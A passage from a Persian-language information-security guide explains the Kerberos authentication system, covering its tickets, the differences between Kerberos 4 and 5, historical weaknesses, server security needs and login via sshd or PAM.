‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﺪ ﺗﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﺩﺭ ﺷﺒﻜﻪ ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻢ ﻗﺒﻠﻲ ﻛﻪ ﺳﻴﺴﺘﻢ ﺯﻣﺎﻥﻣﺸﺘﺮﻙ ﺑﻮﺩ ﺣﻔﺎﻇﺖ ﺑﻪ ﻋﻤﻞ ﻣﻲﺁﻣﺪ‪.‬‬
‫ﺭﺍﻩﺣﻞ ﻧﻬﺎﻳﻲ ‪ MIT‬ﺑﺮﺍﻱ ﺭﻓﻊ ﺍﻳﻦ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ "‪ "Kerberos‬ﺑﻮﺩ؛ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺱ ‪ -‬ﻣﺜﻞ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺑﺎﺯ ‪ -‬ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ‪ DES‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ‪ .‬ﻭﻗﺘﻲ ﻛـﺎﺭﺑﺮﻱ ﺩﺭ ﻳـﻚ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﻪ‬
‫‪ Kerberos‬ﺭﻭﻱ ﺁﻥ ﺩﺭﺣﺎﻝ ﺍﺟﺮﺍ ﺍﺳﺖ ﻭﺍﺭﺩ ﺷﻮﺩ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﻳﻚ "ﺑﻠﻴﻂ" ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻠـﻴﻂ ﻛـﺎﺭﺑﺮ‬
‫ﺗﻨﻬﺎ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺑﺎﺯ ﻣﻲﺷﻮﺩ ﻭ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﺑﻠﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺖ‪ .‬ﺍﺯ ﺍﻳﻦ ﺩﻳـﺪﮔﺎﻩ‪ ،‬ﻫﺮﮔـﺎﻩ ﻛـﺎﺭﺑﺮ‬
‫ﺑﺨﻮﺍﻫﺪ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﻳﻚ ﺑﻠﻴﻂ ﺧﺎﺹ ﺁﻥ ﺳﺮﻭﻳﺲ ﺍﺭﺍﺋﻪ ﻛﻨـﺪ‪ .‬ﭼـﻮﻥ ﻫﻤـﺔ ﺍﻃﻼﻋـﺎﺕ ﺑﻠـﻴﻂﻫـﺎﻱ‬
‫‪ Kerberos‬ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺭﻭﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﻗﺎﺑﻞ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻫﻢ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫‪ Kerberos 4‬ﻭ ‪Kerberos 5‬‬
‫ﭘﻨﺞ ﺑﺎﺯﻧﮕﺮﻱ ﺍﺳﺎﺳﻲ ﺩﺭ ﺗﺎﺭﻳﺦ ‪ Kerberos‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺍﺯ ﺩﻭ ﻧـﺴﺨﺔ ‪ Kerberos‬ﺩﺭ ﺑـﺎﺯﺍﺭ ﻣـﻮﺭﺩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪.‬‬
‫ﻛﺎﺭ ﻛﻨﺪ‪ ،‬ﭼﻨﺪ ﺳﺎﻝ ﺍﺳﺖ ﻛﻪ ﺍﺭﺗﻘﺎ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ‪ ،‬ﻭ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻗـﺪﻳﻤﻲ ﻣﺤـﺴﻮﺏ ﻣـﻲﺷـﻮﺩ‪ .‬ﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ‪ ۱۹۹۶‬ﻓـﺎﺭﻍﺍﻟﺘﺤـﺼﻴﻼﻥ‬
‫ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ‪) COAST‬ﮐﻪ ﺩﺭ ﺳﺎﻝ ‪ ۱۹۹۸‬ﺑﺎ ﻣﺮﮐﺰ ﺗﺤﻘﻴﻘﺎﺗﻲ ‪ CERIAS‬ﺍﺩﻏﺎﻡ ﺷﺪﻩ ﺍﺳﺖ( ﺩﺭ ﺩﺍﻧﺸﮕﺎﻩ ‪ Purdue‬ﻳـﻚ ﺿـﻌﻒ ﻋﻤﻴـﻖ ﺩﺭ ﻧﺤـﻮﺓ‬
‫ﺳﺎﺧﺘﻪﺷﺪﻥ ﻛﻠﻴﺪ ‪ Kerberos 4‬ﻛﺸﻒ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻠﻴﺪﻫﺎﻱ ﻧﺸﺴﺖ ﺭﺍ ﺩﺭ ﻋﺮﺽ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺣﺪﺱ ﺑﺰﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ‬
‫ﺑﺮﺍﻱ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻳﻚ ﺍﺻﻼﺡ ﺑﺼﻮﺭﺕ ﮔﺴﺘﺮﺩﻩ ﺗﻮﺯﻳﻊ ﺷﺪ‪ ،‬ﺍﻣﺎ ﻣﺸﺨﺺ ﺷﺪﻩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ‪ Kerberos 4‬ﺩﺭ ﺑﺮﺍﺑﺮ‬
‫ﺣﻤﻼﺕ ﺳﺮﺭﻳﺰﻱ ‪ buffer‬ﻫﻢ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭻ ﺍﺻﻼﺣﻲ ﻧﻴﺰ ﺑﺮﺍﻳﺸﺎﻥ ﺍﺭﺍﺋﻪ ﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪ Kerberos 5‬ﻣﺸﻜﻼﺕ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ ﭘﺮﻭﺗﻜﻞ ‪ Kerberos‬ﺭﺍ ﺭﻓﻊ ﻛﺮﺩ ﻭ ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ﻣﻌﻤـﻮﻝ ﺷـﺒﻜﻪ ﻣﻘـﺎﻭﻣﺘﺮ ﺳـﺎﺧﺖ‪.‬‬
‫‪ Kerberos 5‬ﻫﻤﭽﻨﻴﻦ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮﺗﺮ ﺍﺳﺖ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ﻛﺎﺭ ﻛﻨﺪ‪ Kerberos 5 .‬ﻫﻤﭽﻨﻴﻦ ﭘﻴﺶﺑﻴﻨﻲﻫﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﻛﺎﺭ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻏﻴﺮ ‪ DES‬ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮﭼﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻳﻲ ﻣﺜﻞ ‪ DES‬ﺳﻪﮔﺎﻧﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﭼﻨـﺪﺍﻥ‬
‫ﮔﺴﺘﺮﺩﻩ ﻧﻴﺴﺖ‪ ،‬ﺑﻴﺸﺘﺮ ﺑﻪ ﺩﻟﻴﻞ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻗﺪﻳﻤﻲ ﻛﻪ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬
‫‪171 Massachusetts Institute of Technology‬‬
‫‪172 Timesharing‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪ Kerberos 4‬ﺍﺯ ‪ Kerberos 5‬ﻛﺎﺭﺁﻣﺪﺗﺮ ﺍﻣﺎ ﻣﺤﺪﻭﺩﺗﺮ ﺍﺳﺖ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪ Kerberos 4‬ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ ‪TCP/IP‬‬
‫‪٣٣٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ‪ Kerberos 5‬ﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﺟﺪﻳﺪ ﻧﻴﺰ ﺩﺍﺭﺩ‪ :‬ﺍﻣﻜﺎﻥ ﺗﻔﻮﻳﺾ ﺷﺪﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺑﻠﻴﻄﻬﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻥ ﺍﻧﻘـﻀﺎﻱ ﺑـﻴﺶ ﺍﺯ‬
‫‪ ۲۱‬ﺳﺎﻋﺖ‪ ،‬ﺑﻠﻴﻄﻬﺎﻱ ﺗﺠﺪﻳﺪ ﭘﺬﻳﺮ‪ ،‬ﺑﻠﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺯﻣﺎﻧﻲ ﺩﺭ ﺁﻳﻨﺪﻩ ﻓﻌﺎﻝ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﮔﺰﻳﻨـﻪﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺩﻳﮕـﺮ‪ .‬ﭼﻨﺎﻧﭽـﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ‬
‫‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ‪ Kerberos 5‬ﺭﺍ ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ‪ IETF.‬ﺭﻭﻱ ﺑﺎﺯﻧﮕﺮﻱ ﻭ ﺗـﺸﺮﻳﺢ ‪ RFC‬ﺷـﻤﺎﺭﺓ ‪ - ۱۵۱۰‬ﻛـﻪ‬
‫‪ Kerberos 5‬ﺭﺍ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ ‪ -‬ﻛﺎﺭ ﻛﺮﺩﻩ ﻭ ﭼﻨﺪ ﺗﻮﺳﻌﺔ ﻗﺎﺑﻞ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺍﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪Kerberos‬‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ‪ Kerberos‬ﺗﻤﺎﻣﹰﺎ ﺑﺮ ﺍﺳﺎﺱ ﺩﺍﻧﺴﺘﻦ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ Kerberos‬ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺑﺮﺧﻼﻑ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ‪ Unix‬ﻛﻪ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻳﻜﻄﺮﻓﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﺭﻣﺰ ﻋﺒﻮﺭ ‪ Kerberos‬ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺫﺧﻴﺮﻩ ﻭ ﺑﺎ ﻳـﻚ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻢ ﻣﺘﺪﺍﻭﻝ ‪ -‬ﺩﺭ ﺍﻛﺜﺮ ﻣﻮﺍﺭﺩ ‪ - DES‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﻭ ﻟﺬﺍ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺷـﻮﺩ‪.‬‬
‫ﻛﺎﺭﺑﺮ ﻧﻴﺰ ﺑﺎ ﺍﺛﺒﺎﺕ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺗﺼﺪﻳﻖ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﻳﻦ ﺣﻘﻴﻘﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﻣﺰﮔﺸﺎﻳﻲﺷﺪﺓ ﻛﺎﺭﺑﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﺩ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ‪ Kerberos‬ﺍﺯ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﺪ‪ ١٧٣.‬ﺍﻳﻦ ﻳﻚ ﻋﻴﺐ ﺟـﺪﻱ ﺳﻴـﺴﺘﻢ ‪ Kerberos‬ﺍﺳـﺖ‪ .‬ﻣﻌﻨـﻲ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺑﺎﺷﺪ ﻭ ﻫﻢ "ﺍﻳﻤﻨﻲ ﻣﺤﺎﺳﺒﺎﺗﻲ" ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ‬
‫ﺑﺎﺷﺪ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﺍﻓﺸﺎﻱ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺎﻳﺪ ﻧـﺴﺒﺖ ﺑـﻪ ﺣﻤـﻼﺕ‬
‫ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻳﻤﻦ ﺑﺎﺷﺪ‪ ،‬ﭼﺮﺍﮐﻪ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﺘﻮﺍﻧﺪ ﻭﺍﺭﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺷﻮﺩ ﻭ ﺩﺳﺘﺮﺳﻲ "‪ "root‬ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﺑـﺎﺯ ﻫـﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﻫﻤـﺔ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺪﺯﺩﺩ‪.‬‬
‫‪ Kerberos‬ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﺷﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﻣﺴﺘﻘﻞ ﺍﺯ ﺣﺎﻟﺖ ﺑﺎﺷﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﻘـﻂ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻭ ﻫﺮﮔﺎﻩ ﻻﺯﻡ ﺑﻮﺩ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺍﻳﺠﺎﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺗﻜﺮﺍﺭ ﻭ ﺛﺎﻧﻮﻳﻪ ‪ -‬ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻧﺒﻮﺩﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻـﻠﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺗﻘﺎﺿـﺎﻫﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﭘﺎﺳـﺦ ﺩﻫﻨـﺪ ‪ -‬ﺭﺍ ﻧـﺴﺒﺘﹰﺎ ﺁﺳـﺎﻥ ﻣـﻲﻛﻨـﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺍﻳـﻦ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻧﻴﺎﺯ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻣﻠﻲ ﺍﺯ ﺗﻤﺎﻡ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ‪ Kerberos‬ﺩﺍﺭﻧﺪ‪ ،‬ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛـﻪ‬
‫ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﻭ ﻫﻢ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻳﻤﻦ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻭﺭﻭﺩ ﺍﻭﻟﻴﻪ ﺑﻪ ﺳﻴﺴﺘﻢ‬
‫ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ‪ ،‬ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﻪ ﺍﺯ ‪ Kerberos‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻣﺸﺎﺑﻪ ﻭﺭﻭﺩ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﻋﺎﺩﻱ ﺍﺳﺖ؛ ﻳﻌﻨـﻲ ﻧـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﺎﻳﭗ ﻣﻲﻛﻨﺪ ﻭ ﺍﮔﺮ ﺻﺤﻴﺢ ﺑﻮﺩﻧﺪ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻣﻲﺷﻮﺩ ﻭ ﻛﺎﺭﺑﺮ ﭘﺲ ﺍﺯ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺑـﻪ ﻓﺎﻳﻠﻬـﺎ‪ ،‬ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﭘﺮﻳﻨﺘﺮﻫﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻣﻨﺎﺑﻊ ﻣﺸﺎﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪.‬‬
‫ﺍﻟﺒﺘﻪ ﺁﻧﭽﻪ ﺩﺭ ﭘﺲ ﭘﺮﺩﻩ ﺭﺥ ﻣﻲﺩﻫﺪ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺳﺖ‪ .‬ﻭﻗﺘﻲ ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ‪ - ١٧٤sshd -‬ﻳـﺎ ﻛﺘﺎﺑﺨﺎﻧـﺔ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ -‬ﻣﺜﻞ ‪) - PAM‬ﻳﺎ ﻳﻚ ‪ daemon‬ﺩﻳﮕﺮ ﺷﺒﻜﻪ( ‪ Kerberos‬ﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ‪ ،‬ﺍﺯ ﺳﻴﺴﺘﻢ ‪ Kerberos‬ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻛﺎﺭﺑﺮ ﺑﻬﺮﻩ ﻣﻲﺑﺮﺩ‪.‬‬
‫‪ ۱۷۳‬ﭼﻮﻥ ﺯﻣﺎﻧﻴﻜﻪ ‪ kerberos‬ﺗﻮﻟﻴﺪ ﺷﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻗﺎﻧﻮﻥ ﻣﺎﻟﻜﻴﺖ ﻣﻌﻨﻮﻱ ﺑـﻮﺩ‪ ،‬ﺍﺯ ﺁﻥ ﺩﺭ ‪ kerberos‬ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ‪ .‬ﻳـﻚ‬
‫ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﻪ ﺍﺯ ﻃﺮﻑ ‪ IETF‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻨﻮﺍﻥ "ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺁﻏﺎﺯﻳﻦ ﺩﺭ ‪ "kerberos‬ﻣﻌﺮﻓﻲ ﺷﺪﻩ‪ ،‬ﻭ ﺭﻭﺷـﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺩﻏـﺎﻡ‬
‫ﻛﺎﺭﺗﻬﺎﻱ ﻫﻮﺷﻤﻨﺪ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑﺎ ‪ kerberos‬ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﭘﻴﺸﻨﻬﺎﺩ ﺑﻮﺳﻴﻠﺔ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪ ۱۷۴‬ﻭﺻﻠﻪﻫﺎﻱ ‪ OpenSSH‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ Kerberos 5‬ﺩﺭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫‪http://www.sxw.org.uk/computing/patches/openssh.html‬‬
‫ﻫﺮﭼﻨﺪ ﺩﺭ ﻛﻨﺎﺭ ‪ Kerberos 4‬ﺍﺯ ‪ SSH‬ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻩ‪ ،‬ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻛﻪ ﺩﻭ ﺳﻴﺴﺘﻢ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻧﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻛـﺮﺩ‪ .‬ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ ﭘﺮﻭﺗﻜـﻞ‬
‫‪ SSH‬ﻧﮕﺎﺭﺵ ‪ ۲‬ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻻﻳﻪ ﺍﻣﻨﻴﺘﻲ ﻣﺸﺎﺑﻪ ‪ (GSSAPI) Kerberos 5‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﻛﻪ ﺑﺎﻋﺚ ﺳﺎﺩﻩ ﺷﺪﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻣﺴﺎﺋﻞ ﻣﻲﺷﻮﺩ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﺔ ﻣﺮﺑـﻮﻁ‬
‫ﺑﻪ ‪ IETF‬ﻛﻪ ﺍﺩﻏﺎﻡ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ‪.draft-ietf-secsh-gsskeyex‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٣٩‬‬
‫ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ‪ Kerberos‬ﺑﺎﻳﺪ ﺑﺪﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Kerberos‬ﺭﺍ ﭼﮕﻮﻧﻪ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗـﻮﺍﻥ ﻫـﺮ‬
